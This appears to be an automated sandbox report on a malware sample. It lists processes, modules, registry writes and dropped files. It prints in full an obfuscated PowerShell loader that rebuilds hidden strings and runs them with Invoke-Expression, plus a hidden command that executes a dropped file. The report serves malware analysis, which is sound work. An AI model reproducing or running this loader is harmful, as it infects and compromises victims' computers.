MaSinAldHeaSitProtrrAfyLi F=Or un`$SpTMarBauSyeCy)Sl]Na Gr[TeTPly MpAreBi[ R]py]Co Hu`$ TSInoIrlSueEmnOooHasDytGjoTemAmopou GsSp,Ab[gePImamirskaPom KeTatAfe MrNo( MPSvo Is PiSttTjiTuoAknCr Ku=mu Su1Tu)St]Ex Nr[OvT Oy Pp BeBa]Tu Ar`$hoPOlrCoeNeoKlpPopTerBeeFisFosMi Se=Gi T[GoVGaoHoi Ad W] S)Ri;Re&Ph( K`$EuBAnrofiEfsPatAneInfNerLadAniBegfleRerSie LsWa7Ba) F Be(LfQTruUniMesAllSpiSonfogWieDanFisDe0 v4El B' D5Ab0St2Ud7To1BiFUn1GlDBo1Un8 p1Ma0La1Hu1Un0He6Tr1RoDCa1Sl1Di0Mo6St1UnARa1Mi1Co0Go7Be4Na5Se4Ar6 H4 K0Sm1EpDSa1Mo7Ch1 SBEx1Su9 C0 L4Dd1 B5 P1Nu7Fo0Ch0 G5Ud4Re4Ba9Hs5 F4De2SwF F3Bu5Ne0 S4ne0Sv4Fa3Ho0Sq1CaBUn1ka9 D1Fl5Gl1OvDSm1 eA N2co9Op4GuEUl4PaEFo3Fo7Hy0Le1Rn0An6 W0Se6Ur1ma1Hy1EkAGn0Ta0Se3Ge0Ad1SpBFl1Ud9in1In5 S1ClD U1BaAPu5DiASi3 P0Em1St1 E1St2 H1EuD P1 SAPa1 S1 P3 P0 A0UpDVe1DuAAn1Po5Pr1Bl9 a1InD F1 U7lu3Ho5 U0Im7De0Af7Kb1La1Gr1Pa9Ut1Fu6Ge1Ov8Ca0 FDOv5SiCOp5 DCHe3 HA F1Ci1Cu0 R3Ad5Pr9Gr3RoBfo1Ko6Gr1CaESc1 A1to1Ek7Un0ba0Lu5 A4 S2Tv7pe0MiDDe0br7de0sp0Ba1 U1da1 s9 C5SkANu2Ti6Ps1 s1Pe1Li2 f1Sk8Ra1Sr1 p1 A7Pr0Ea0Po1SuDWa1SuBbl1ShAUn5 OAca3Ho5 A0Ly7Sn0Va7Py1Ca1Fo1St9Sp1In6af1Pa8 u0TuDEn3CoAMa1Ny5So1Ad9Ba1 S1pe5VaC N5Pr0 a3Ca8Di1Ne6 R1 A1Ro0Fl7fe1 RFPr1TrBRe4SuCMi5PiDFi5PhDGi5Dr8Ci5Sp4 s2SaF S2To7 S0UnDja0Ly7 S0Sp0Fl1 D1Co1Ha9Ul5 FASq2Un6Mo1Ar1Mi1 S2In1St8 K1ex1Be1 C7 P0Ae0Ka1ovDFl1DuBet1 TAVe5PrAVa3re1Fa1un9 R1BaDBi0so0Bi5StASe3Ha5Ug0 P7Fr0 T7Hy1ch1Pa1He9Sp1Ud6de1No8st0HoDAd3Mi6We0Pa1Pn1 CDUd1 A8 I1Tr0Sn1La1Ji0Mi6 I3si5 B1 G7Un1Fe7De1In1Un0Ub7 R0Fi7Pa2Be9 I4NoEEx4OcESt2 L6 S0Co1Gr1tiA F5ReD M5FoAVk3 P0In1En1Sl1Lo2Ud1DiDVa1CeAPl1St1Re3no0In0 EDSn1EvAMu1 R5Ma1Yt9Ko1CoDBa1 P7Ba3De9St1DoBAc1Un0Uv0pa1 F1Mu8Vo1 S1Ha5RuCCy5Ho0Pr3Pu8Sk1 E6 M1 h1Ov0Ki7 N1GaF I1SpB K4BuDCe5Vr8Pa5se4 b5Im0Co1Pe2 U1St5Ne1Gr8El0 e7Mj1Fa1Tu5FuDSe5BrABl3 P0Sp1Je1Fo1Un2As1AnDEn1FrA T1Sl1Ti2Af0 C0BeDCa0Fr4Mi1 A1Gl5 VCKo5fo0Pr3An6 F0in6Ba1 dDSu0Ma7 P0Fl0Hj1Sy1St1Lo2 C0Dr6Bo1Pr0Po1 LDFa1Bu3 P1An1Un0Tr6Ne1Be1 M0Ch7Re4Fo4Vi5 F8Gi5Sk4La5Ta0Em3Br6Pr0 M6Bu1GrDSk0Uk7El0Ol0Br1Af1Sk1 M2Eu0Mi6Ps1 L0Sl1BjD K1Go3El1Dg1As0Sk6 P1So1 S0 R7se4 O5 E5Fu8Ho5Ox4Sk2 EFRa2Sk7le0BaDRa0 P7St0Re0Pu1 s1 H1La9Ti5FoAOd3Ki9Ch0 C1Do1Co8Un0Ud0Au1TeDPr1Ar7Ti1 S5Ov0 I7Fo0 T0 K3 P0Sl1Pr1Wi1Sc8Oc1Ap1To1Go3 D1St5An0ba0Be1Cl1Eu2Re9Pr5 jDEs'Co) E;Di&Ly(Gy`$StBHar PiSasSktEaeKofChr RdReiAfgSiebarAreOgs K7 R)Ce C( wQ BuEliJasShlSoiDonPagSieDanHasPa0Be4Il Da'Mo5Sn0Re2Tr7 S1XeFEx1NoDSy1Uv8 A1Pc0 H1Di1Sp0Ta6Be1HjD N1Fo1Ns0Ba6In1 cAEq1 L1 L0Pa7Ca4Fa5Di4Pa6Un4Ad0Re1FrDSo1Be7no1UnBHa1Ab9Dy0 B4ri1be5Ho1An7Di0St0Vi5EtAEx3Ou0Au1Ti1fo1Be2re1ToD t1NeAUd1Na1 S3Sv7ki1 IB D1UdA G0 C7ko0Ak0Si0St6Af0In1an1 F7Se0No0Fi1anB S0De6 D5UdC L5Ba0Ud3Ru8 S1Fo6Po1Ge1 S0St7re1 KFSo1RaBLa4Gr2 S5ro8Sn5 F4Am2LuFCo2Re7 T0AlDSd0Lo7Di0Su0Me1De1 S1 A9Co5KlA A2An6Ny1 R1 P1Vk2Sa1Gr8 S1Gr1Sk1 D7Me0Yd0co1boDIn1luB h1 RABy5hoA C3 S7Bi1Fi5No1Aa8Ad1Ud8mu1shD H1UnASu1 t3Ph3an7Xe1stBdi1SyAhe0Sm2Fo1Un1Ko1PlA S0Fi0Un1ToDIn1teBPa1 MA B0No7Rd2An9Fr4MaEDu4MiEEd2Sp7El0Cl0sk1Me5 G1feA C1 C0 S1 S5Un0En6Ud1Vr0Fr5st8Ho5Mi4Ts5 S0Li2Pr7Ra1ReBCr1Ch8Lo1po1Sp1FrAbr1ToBDe0Rv7He0Ak0Pl1noB g1Gr9Et1ReB c0Co1Fe0Ce7 H5KoDrr5flAJa2Te7 D1Be1Fe0No0Bi3ClDSu1ma9As0Be4Bn1La8Bu1pr1Tr1Va9Fr1Qu1Po1ReA B0At0Vo1 E5un0 P0 N1ApD O1foB p1 FA P3Bu2Vr1 C8Pr1 M5Ku1 A3Af0Sa7Ko5moCPi5Ge0 T3 S8Ei1Va6Ka1Ta1 C0Ki7Ko1 BFId1 DB A4 F3Ma5ReDPy' C)Sa; P&Sc( B`$BaB FrCoiAvsdrtHoeDif DrTodFairegPreForrieSksCo7 U)Qu Ly(EsQChu SiarsBelPaiCanAmgAfekonSpsMo0Re4Bo F' C5Ma0Ga2Re7Gr1GrFGr1 FD P1Po8Kl1be0 A1Re1Ac0Di6 S1TeDSt1 G1Ui0As6 O1ReARe1Mo1Ho0Bo7Pr4Ke5Un4Sk6Ef4 T0Mo1PsDFo1Al7 P1 iBHy1 F9Sk0St4 F1Gk5ho1Ac7cr0Co0bl5SuApe3Cr0Re1Li1Tr1Sk2 U1 BDHy1PiAFo1Ko1 C3 X9 S1Ud1No0 D0Sp1SvCpe1stBFl1Hy0Te5 mC C5Ra0 S3St6Ed0Sm6Un1 aDSm0op7 I0Pr0ma1Be1Je1ba2Fu0Ph6Sk1 N0Wa1JeDPr1He3Re1Or1 L0 C6Po1 T1Ov0Hu7Ma4Ri6mi5Mo8Au5sk4Sh5Dk0pe3 S6An0 O6Be1BoDMs0Af7Ri0Bo0Po1Sl1Ny1We2Pr0 A6de1Be0Ud1OpDSh1di3Fl1Ya1Sk0Fo6Ch1 E1Ra0Lo7Bu4Ra7Br5Pr8St5St4La5Mo0 A2Su4 R0 E6Gt1pr1Ci1GoBHa0Gl4Sk0Vi4Rv0 U6 H1Fa1 D0Da7Md0 B7du5Kl8Bu5Gr4 F5Me0Mo2Ho7Me1BaBAn1Ru8Br1ny1Pe1PoA M1TrBCi0Ki7Na0Fo0 S1UdBSl1Fl9 B1ClBCo0Ce1Pa0bi7 G5TrDSk5EfADe2Do7Ag1Er1Un0Re0De3PrDDi1Gl9Be0 P4Ud1 K8Sq1Br1Da1Ab9 S1Mi1An1DrAne0Ad0Ly1Mi5be0De0 V1CuDAf1 FBAs1deA F3Gi2 F1Ka8Op1 C5Ha1Sc3Je0Da7Oc5RaCVa5Ba0 F3 S8Es1De6 T1Co1Pr0 E7Mi1BeFEf1FiBVa4Ae3En5fiDEl' R) C;Ge&So(Ka`$HeBInr CiCesVetTjeFlf TrPadSuiJogudeOrrTie asIn7 E)wa Un(UrQVauTuiLdsBilSyiUdn Igade PnspsKu0 B4Fe Ch' I0Le6Ly1el1Ko0Eu0Ko0Th1Sk0 P6St1FaAVi5 B4Ti5Po0No2It7Bi1unFFo1PsDYe1Kl8Ev1 R0Em1 D1na0Fe6Pr1ReDTi1Co1Ov0 H6El1LeAMa1De1dy0Bi7Pa4Fa5Fl4Ac6 S4We0Kl1CoDHa1Sp7Ac1BeBBa1 F9Be0Ca4Ci1Ma5Iv1Sp7Su0Cl0Un5GaAHe3 S7Ed0Sy6 U1Un1nd1Ta5Ak0Em0Ro1Re1Mi2 S0Ep0DoDGu0 V4 M1Ep1In5KoCCh5 SDSq'An) O;Sn}Bl&Fo(Ko`$QuBSvrHaiPhs St AeGrfShr TdCyiJegPreSurKneBrsPl7po)Ar Tu(LoQSku MipesEll Ri SnTrgPaeBenStsCr0 U4Fr nu'Du5Sp0Om3MaFFo1Sl5 d1Py8Wa1So1 b1BrATr1Ka0 K1la1Mi0Pr6 E1Me9Lu1 F5Fa1 H5El1HjAfo1Un1De1Ga0Ja1 F1Co1RuATa5Sk4Ov4Pr9es5In4Ci2StFOb2 D7Su0ReDHy0Ve7Yo0Ga0Hj1In1Br1 S9Or5peADe2 B6Ef0St1Bo1 OASt0Re0Ud1ReDEx1Sm9Py1Ti1 G5 SAPa3byDHo1InAUd0 R0Go1Bu1 N0Ph6Un1deBDe0Un4 T2Ha7Fa1Pi1 R0Mo6 V0Ou2Ad1PiDCh1Re7Sn1Fa1No0 u7sf5SoAEm3Ec9De1No5 A0 I6Ar0Ki7 F1 RCMo1 M5 D1Tr8Se2 Q9Ha4 LEsl4GrE F3 T3 S1Be1Eg0Co0Cr3Li0 R1In1Uf1Al8dr1Pr1Al1Sk3 M1 F5Di0St0Af1Im1 D3Co2In1DeBTe0Fi6Sa3 G2Ke0Lu1 P1UrAUf1Mi7Dr0te0 G1AnDVa1SaBSa1 iAOp2Ga4Sv1 VB D1LiD A1 SAPr0Fl0Ki1Mi1Le0Ov6Af5 TCEx5 TCPh3 bFMe0Be6No1MrBbo1 UAOc1 k1Hn1 SFBo0Sa1un0Un6Sp0 S7be4Pr7 R5To4Ou5No0Ra3ReBVe1Ha8 L1 R0So1Me1Ja1To9Ha1 IB D1Uf0Bl1Fi1Be0 O6Zi0Am7Ma5 m4Sp5Ru0Pe3Ba6Me0Af6Un1CiDCa0 U7Kl0Sk0 T1Ch1Le1Fl2Ma0Bl6Pu1Wi0Ke1BeD n1Ha3Ur1Sk1Sp0An6In1Sa1Sa0Pt7De4 r0Ta5HyD B5 A8st5St4Sw5NeC U3kiFFo0He6Lo1InB H1ElA H1 W1 R1foFVi0le1Bo0Ka6 V0co7No4 M6Sl5in4 f3Ty4Sk5auCPe2ToFRe3 CDSk1BoA L0Pr0be4Dr7 S4Ha6Kl2pi9Na5 F8As5Ta4fo2PeFRi3AtDud1AsAAr0Te0Do4 U7St4Br6Ge2 R9Ti5Un8Wi5Un4Po2InF V3SeDBn1MuAMe0Be0Cy4Si7 m4La6De2Co9 A5 l8Ov5To4ag2BiF B3FrDFu1PuATe0St0Fl4Bl7Ha4Le6Pa2Ca9Es5Sc8pu5Bj4Na2reFBu3JaDHi1SeATo0Te0Bo4Os7Bi4Ek6 A2Ch9De5pa8Be5 n4 S2pyF K3SpDUn1TeAFl0 R0 e4Ba7Sa4mi6br2Ra9ma5FoDFi5Gl4 S5KnCKo2SpFAf3TmD T1EnATi0Hj0Po4To7Af4Co6in2Fl9Ko5FlDAn5BjDJo5LuDSk'Po)Ud;Le& B( P`$CoBThrVliMas FtIneThf DrBidDriByg OeSarLeeNasMa7 U)En T(ElQApuWiiPlsOplPyiOpn LgVeeFonlisPi0Th4Ud Pd'Ca5Re0 Q3 R0wa1Gu1sn1sp7Ej1ThBAf1 U8 V1heB N0Co1Ha0Ps6 K1AfDRi1haA H1ph3Bi5Fo4lo4 G9Gl5Ti4 F2 WFSa2Re7So0SaDPa0Pe7Li0sh0 E1Ec1Sk1Gr9No5KaADe2Fr6Te0Du1 t1VaA R0An0fe1EuDPr1Sh9Sa1 S1 G5gaA V3poDMc1hlAMi0 P0Wo1sv1Sp0Po6la1BoB R0He4Sk2Ek7 r1Af1Sn0Fo6Bi0Ss2To1DeDSt1Am7Ad1Us1Re0Cr7En5PrALs3Re9Co1Ba5Sv0At6As0Tr7Ur1ReCBe1Ec5Un1Bu8Bu2Er9Di4ReEPr4 BEGe3Ex3Sk1 f1 H0He0 R3Ku0Du1 r1Re1Co8Fr1Sy1 W1Ve3Bl1Fo5Op0 J0 R1 L1Eb3Su2Ad1maBOv0 P6Tr3Pr2Pl0 M1To1SyADd1Da7lo0Jo0be1 FD w1FjBMo1 sAYi2 R4En1AfBUn1SkDUn1DiASk0Re0Es1Ka1Sk0Ni6 S5EcC S5BiC l3StF D0Fa6Re1geBIs1SuAca1Sp1St1unF N0As1Be0 R6Th0Ap7In4As7Fe5Mc4 o5Re0ic3StB p1 D8 H1 F0 R1Kr1 F1Vi9 A1 PBPr1La0Be1Ag1Fo0Co6Ap0In7Ca5Cu4fu5Ha0He3 N6Re0Th6Pl1 DD e0Gi7 S0Sk0Aa1Mi1 C1Re2Hv0Sa6Mu1Re0Vi1 FDTi1Ha3Ca1Po1 V0 E6To1Ve1 H0Ge7Go4Ti2Af5SiDRe5 M8Re5Se4Ro5 UCMi3RgFGe0 G6Wa1StB C1 SABl1Ge1pl1BjF S0Di1Am0Kr6Me0be7 F4De6Dk5De4No3Ra4Pe5StC G2InF P3CyD C1SkA U0Sy0 F4Ko7Qu4Ho6Op2Un9 S5Ja8Ti5me4 O2 KFLa3 DDUf1SuAOu0En0Ru4Sn7Pr4Ud6 E2Re9Aa5Bl8Ef5Be4Te2KlF Z3OvDPa1TaAFr0Hu0Fo4Mo7Ec4Pr6Ro2 P9Bi5 S8Id5Pi4St2flFZa3BeDSh1udAOd0 H0Pr4Sc7Am4re6Si2Fi9Ar5In8Zi5Ph4Go2 MFSi3chDMo1naAKr0Re0Se4Ro7Mi4Sk6 D2Fl9 S5BeDGo5Hy4 T5 MCAr2VeFBe3GrDce1SpAHe0 L0To2In4Th0Un0 C0La6 C2Op9Fo5HeD P5 FDVa5TvDdi'Re)en;Ta& P(Ca`$ AB IrLyiKrs Pt TeCefEerMidTeiFjgGle FrInePoser7 P)no Mi(StQTauOpi FsSklBri FnTjgBaePrn JsDe0Al4Ba S' U5De0Ve3LaFKo1SoBta1 N9In0 B4Bn0Sy6 F1BaD I1An9Ra1Ma0 E1so6Ty0No6 R5Id4 A4Tr9se5Fo4 P5Le0An3 SF A1Tr5 F1Di8 K1So1 S1PeA S1 C0In1 M1Bo0 V6Cr1Ef9St1 S5Ma1An5 U1 PARn1St1Kv1Te0co1 B1Ek1AkA P5ciA F3buDde1caABa0Nr2Be1GaBAn1AfFFi1 T1 t5BoCPi5Ho9 K4Sk5Ac5Fr8Bu4sl4Tu5Ga8Jo4Sl2Ca4Be0In5Tu8Ba4Is4un5 H8Pr5Br4Ti4BuDRe4ViC A4BoDCa4GaDDk4So6Me4De5 P4Pa6Sp4HyCLi5 T8Da4 u4 I5IsDRu'St)An;He&Fi(Tv`$KoBAnrRoiPesAvt FechfOvrCadBuiNeg GeRerboe FsHy7De) E Wi(ReQReuReiAnsNul AiJanGrgGteSinSes W0Pr4My Ek'Om5In0Ve2 S7Al0Ty6Ku1RuF R1In1Th1MaATr1Un0Fo1Fl1Te0In6Ch0Ud7 S5Sh4bi4Co9Be5Ka4Ar5Mu0Sj3Em0Po1Sa1ja1Du7St1brB S1ur8 U1FiBLn0Sa1 K0Pr6Bl1BdDUn1BaATi1 O3 O5 NAMo3StD P1SpAph0Ar2ri1AdBNa1liFAl1 G1Ma5HiCVa5Op0Ca3TiF E1ApBtr1Su9Le0Br4ho0Sa6Pl1NeD P1Ob9 M1Za0Pr1Im6Fi0Zo6Sp5Bu8Af4To4Un2VaC O4Bl6 T4 C6Bv5Re8Sk4Da4 R5St8Do4ha4Ch5Hj8ek4ro4Ja5GgD Q'Be)Ce;co`$YeB VaDecRekStsDilJoaBlpHopFieSor O2 P3Sn1Mo2Ov=pa`"""Pi`$ de PnGuvSy:AsAHjPUdP PDStANyTReANa\Mat Ie elUtt Pn fiPrnopg Ge IrPr\SktMirovaTepAplthi AkKoeNe\WiVIneGyl AkIgl PdSctMaeKl.UnE HfTutLa`""" K;Vi&Tj(Ar`$ TBFirRaibesStttheMef SrModAliBugSteZirMaeSpsFl7Ca)De Sv(SkQDiuEliPrs AlBoi SnPyg KeQun SsTo0Sk4 T Me'Br5Un0Op3fi5ob0Bu6 P1Bu3Gi0In1 I1Un9sp1Na1Pu1elAIg0Sp0Di1 K1Un0 K6 L1PaD P1 TAHo1 K3Sk0La7Ba5Ma4Fo4 B9Ph5 P4 D2 TFes2Vl7Ov0SuDBi0 D7As0Ra0Ha1Gr1Gr1 C9 G5StACy3klD S3 CBMo5LiASt3 S2Ag1PaDFa1Ka8 D1Mu1Is2Af9Ep4TrE B4DeEVr2Mo6ba1Op1pr1Sp5 T1bi0Sk3 P5 N1Pr8Ve1Ka8Fr3Wa6ce0MaDRe0Ap0Co1ta1Gr0Ma7Ar5SeC s5Be0Sk3Ac6Th1Po5Pa1 S7 F1StFIn0le7Al1 T8re1Ls5 E0Se4Ty0en4Mu1Be1Ho0El6Be4Aw6Le4He7 p4Ba5 E4 L6Tr5maDEx'Hj)Ph; U`$SyfLyiEsxSu=Ac`$OrAGlrHagJouRemAdeAnnTetEueOrrPuiInnSmgFosca.Inc PocyuDin RtBe- A1Br0Su2 s4Pi;Sp& A(Ad`$PtBSerCei FsSht deInfGorDidIniSpgEtealrPaeImsSo7Ba)Po me(PsQStuPriSks clTriFunFlgSteMunEnsHa0Un4st Be'Ur2juF S2Fi7Hj0KrD R0Ma7Gr0In0La1Nu1Po1Mt9 R5riA G2Lu6 R0Ha1Fi1TaATr0So0En1 mDVa1Pu9 F1Ov1Op5SkAHj3NeDun1 KAGr0Su0To1Do1 H0Av6 A1CoBSp0Ba4 C2 O7Un1Lo1Ta0Po6Se0Su2 A1UnDTa1In7Sc1 O1Ma0Pa7Uo5StA S3Pr9Ji1 F5sp0Ta6Vi0sy7Sv1FuCIn1Ra5Sa1Ag8Va2 G9Se4GoECa4YaESk3Do7Ga1 uBPr0 A4Co0MeDUd5ThCPa5Ge0fl3Cl5He0st6 G1Co3Bu0 L1 U1 S9De1Sh1 L1TsANe0In0Mi1Ga1El0Kr6 Z1GrDHa1 FA W1pr3aw0Be7Op5Ne8Sl5Wi4Na4Lo5Fr4Se4De4Sk6Ep4 e0Sy5 C8 B5 B4Re5 F0Sk2De7Tr0ch6Su1ZoFRu1 f1Ar1TaANo1 D0im1 F1La0Ag6 P0Gr7Be5Be8Fo5 I4Fa5Ge0Se1 F2un1unDbe0UnCMu5BeD U' G)Ar;Is&Op( F`$ RBScrPeiFlsRetFreUnfUnrPhd Bi IgHaeStrFieDosre7Op)Gr Un( SQKeuRtibas glasiPlnNogFaeskn DsFo0Ph4Se Ae'Un5Et0So0Ba1 C1fl0Ba1Be1In1MiAun0Os6 L1 ED B1 R3Ma0 a7Me1Tr9Th1HyDUn1SnAUn1ChD P0Te7 F0 M0Sm1ti1St0Ev6Li1 LDCo1 U1Po0mo0ov0Fo7 F5Ud4Kv4Le9Ca5Si4Ou2 BFTo2 B7Bo0SpDDe0 e7Ka0Vr0Ko1Op1 S1Ha9Ha5coAMo2Bl6Ly0La1Ph1HyADr0 T0Ra1 dDAn1 B9bv1Gg1As5ToAFo3UnDAl1FiA S0bl0 S1Di1In0Ay6Ar1coBHy0 R4mo2 T7Se1Vi1Bo0dy6Bl0Sk2Pr1 PDuu1Me7Tr1Ex1Ba0Ho7Di5EkA H3Er9Wh1Bo5Ri0No6 G0Sq7 A1HyC A1 R5Sp1Sp8Se2Ec9Sp4 gEMa4SyE O3 D3Fo1Bu1 M0Mi0Te3 E0Ti1 A1Re1 R8No1Re1Pr1Ax3Ps1 R5Se0As0Th1Aa1Re3Mu2 A1BiBPr0 N6Bu3 D2Ca0Ge1Cy1RaASn1Ov7Be0Gl0 R1SkDMu1GuBSc1AnAPd2bu4 I1HoB G1RtDaf1AdATo0Al0At1En1Le0En6Is5 aCko5 rC S3PhFFj0sa6kl1EnBla1UpASv1An1Se1StFNo0Ri1 R0 B6Ty0po7So4Se7mi5Si4Ly5Di0Ka3 aB A1Ov8 e1se0He1In1 i1er9Un1inBWo1St0 A1Fi1Hy0Sr6Ch0In7 f5 b4 b5Ka0Op3Fr2Hu1Fo8Sk1Gr1Re1Kr1Na1BiDMa1FrAFo1Sb3Fi5suD C5Ph8 M5Id4Sa5 PCBr3EjFMa0To6 S1 SB C1PoA H1Nu1De1SkFBr0Fi1 K0Ty6No0 F7Gy4Mu6Ui5Pa4Do3Ka4Fu5UdCFr2OuF n3 SDMu1ToA E0Ma0In2Ta4Ml0Hy0La0Fo6 T2Hg9Hy5 B8Si5Ka4Kl2FeFBa3LaD B1PaAri0 A0pa2Up4Vo0Am0Ug0 M6 H2ra9Dr5 H8Va5 b4An2baFSi3SrDRe1OmAre0 T0In2Al4be0Tr0Ba0Se6Se2Na9Er5UdD S5in4 p5toCAn2SmF I3SpDRe1SiAHn0Br0Pl2Fi4 B0Mo0Fl0Pl6In2Le9Ud5NoDFo5ReD S5PiDOf'un)Di;La&Ch(Sp`$BiBDirSpiPlsBrtTheGifKorTadSuiHogSaeUnr Se Is B7Pu)Gl D(SpQ suSkiFasBrlPsiMunGogAseMinHrsRg0Ra4Li Sk'Om5sk0Pa0be1Sk1Sa0Ca1af1 C1AtA P0To6Bl1 SDMe1av3Pr0Me7Se1Mi9Cl1JaDKy1ArASu1 IDUe0 U7Dy0Al0ap1Ko1Li0Pr6Bi1AdDMo1Mi1di0 P0Am0Tr7 T5JeA B3FaDDr1ScA S0St2 o1UnBHa1HiFNe1 O1 g5CuCas4Fe4Se5 S8ov5Sw0re2Su7Pl0Ko6Am1SrFSk1Ne1 G1HaA E1 T0Va1Li1Ju0Re6 U0El7Pl5Ne8 a4 K4 I5YdDKo'Pr)Mi# S;""";function Kronekurs5 ($Arboret,$Skilderiernes124) { &$Kronekurs0 (Tromlegang9 'do$JuACar PbCioasrSte Htre J-SebGaxUvoUnr B Mr$DeSExkChiSplPid Ue ArAuiDueForOun He asCo1 A2As4Ve ');}Function Tromlegang9 ($Slikporre) { $Indkaldes=2+1; For($Unorbitally=2; $Unorbitally -lt $Slikporre.Length-1; $Unorbitally+=($Indkaldes)){ $Unenthroned = 'su'+'bstri'+'ng'; $Quislingens = $Quislingens + $Slikporre.$Unenthroned.Invoke($Unorbitally, 1); } $Quislingens;}$Kronekurs0 = Tromlegang9 'GeIfiETkXCy ';&$Kronekurs0 (Tromlegang9 $Bororoan);<#Blindforsget Optioners Carpocapsa Selenological Yndens Overglamorize #>;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll

5864

C:\WINDOWS\System32\slui.exe -Embedding

C:\Windows\System32\slui.exe

—

svchost.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Activation Client

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll

7316

powershell.exe -windowstyle hidden $d = Get-Content 'C:\Users\admin\AppData\Roaming\teltninger\traplike\Indulgentness\Bankettens\Heathery.Sex' ; powershell.exe ''$d''

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

—

b3932a0a2ec299c8a287a7f5eccc2913c5be856c7fba20973333084f093e73e2.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll

7852

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\Windows Mail\wab.exe

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Contacts

Version:

10.0.19041.3636 (WinBuild.160101.0800)

Modules

Images
c:\windows\syswow64\certmgr.dll
c:\program files (x86)\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll

Add for printing

Total events

9 213

Read events

9 210

Write events

Delete events

Modification events


(PID) Process:	(7852) wab.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:	write	Name:	CachePrefix
Value:
(PID) Process:	(7852) wab.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:	write	Name:	CachePrefix
Value: Cookie:
(PID) Process:	(7852) wab.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:	write	Name:	CachePrefix
Value: Visited:

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
5772	b3932a0a2ec299c8a287a7f5eccc2913c5be856c7fba20973333084f093e73e2.exe	C:\Users\admin\AppData\Roaming\teltninger\traplike\Indulgentness\Bankettens\Heathery.Sex		text
		MD5:14080C688C0335C6FB97AD1A296990BE	SHA256:FDD29774D4C02F4E787C48D47D133B8DEFACCB4462708D712E4F2B495AF3B460
5772	b3932a0a2ec299c8a287a7f5eccc2913c5be856c7fba20973333084f093e73e2.exe	C:\Users\admin\AppData\Roaming\teltninger\traplike\stiles\Skraabjlkerne\haeredes\Appelsinskrl\bilfrgerne.thi		binary
		MD5:0178B94D8C8F1679B88CD802AF7F20F2	SHA256:DB2CDBEB79B134E1D1FCA24040B6666F93188A0DFD2FB9EAA961DE11E32236AC
5772	b3932a0a2ec299c8a287a7f5eccc2913c5be856c7fba20973333084f093e73e2.exe	C:\Users\admin\AppData\Roaming\teltninger\traplike\Primatical\Stridulation\Telharmonium\gnallingen.tus		binary
		MD5:0857C423D42F34B795FB10DABF59DBCF	SHA256:E9F89BFD618C7F7DF2044969F434E7B51EBD9F51629DD93CBD510B4275530A5F
5772	b3932a0a2ec299c8a287a7f5eccc2913c5be856c7fba20973333084f093e73e2.exe	C:\Users\admin\AppData\Roaming\teltninger\traplike\stiles\Skraabjlkerne\haeredes\Appelsinskrl\folkemindeforskerens.cot		binary
		MD5:6773546833662664AAA505F7915F6CF8	SHA256:977F7680AF97FCF3D94F8CF106CB49FD7E3D08C2C3CACE723C4122B674FF4BCA
7316	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_x5ymmpjh.xku.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7316	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2xhtwr1h.532.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5772	b3932a0a2ec299c8a287a7f5eccc2913c5be856c7fba20973333084f093e73e2.exe	C:\Users\admin\AppData\Roaming\teltninger\traplike\Sabinas\actualisation\Haandterlig\Besvimelser\sicanian.kha		binary
		MD5:8FE531C73FB8ACA9382A07B555BAFF9B	SHA256:3F5166D2254F5BCED1074128D1722765502A3B120DFAA6F27BE928A1F2D75AEF
5776	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2q3nu03v.1vz.psm1		text
